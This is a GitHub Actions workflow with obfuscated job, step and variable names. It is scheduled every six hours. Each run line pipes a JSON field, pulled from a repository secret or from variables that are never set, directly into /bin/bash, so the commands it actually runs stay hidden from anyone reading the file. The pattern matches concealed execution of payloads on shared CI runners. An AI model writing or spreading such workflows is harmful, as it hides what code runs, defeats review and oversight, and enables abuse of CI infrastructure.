name: jiangjing19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '40 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiangjing19871010
        env:
          qn248: ${{ secrets.qn248 }}
        run: |
          echo $qn248 | jq -r .iazed0 | /bin/bash
          echo $qy34697 | jq -r .pyql2364 | /bin/bash
          echo $n107 | jq -r .kyjyk1504 | /bin/bash
          echo $y0 | jq -r .wzoa37 | /bin/bash
          echo $lwd320 | jq -r .vnt98 | /bin/bash
          echo $fc99 | jq -r .mywr195 | /bin/bash
          echo $tr2 | jq -r .qg64 | /bin/bash
          echo $cjtvd18510 | jq -r .veqq99 | /bin/bash
          echo $w835 | jq -r .pmqc0659 | /bin/bash
          echo $br9 | jq -r .lsb9670 | /bin/bash

